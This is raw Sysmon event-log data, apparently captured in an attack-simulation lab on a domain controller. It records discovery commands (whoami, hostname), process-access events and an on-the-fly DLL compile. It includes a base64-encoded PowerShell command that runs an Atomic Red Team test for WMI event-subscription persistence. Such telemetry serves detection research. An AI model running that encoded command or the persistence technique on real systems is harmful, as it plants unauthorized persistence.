WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 11241100x80000000000000004614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\hinonazn\hinonazn.cmdline2020-12-08 13:54:43.393 11241100x80000000000000004613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:43.393{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\hinonazn\hinonazn.dll2020-12-08 13:54:43.393 10341000x80000000000000004612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A3-5FCF-E900-000000009101}4260C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A3-5FCF-E900-000000009101}4260C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-85A2-5FCF-E700-000000009101}25604296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A3-5FCF-E900-000000009101}4260C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253415(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64) 154100x80000000000000004600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.230{10ACEC4A-85A3-5FCF-E900-000000009101}4260C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000004599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A3-5FCF-E800-000000009101}4612C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 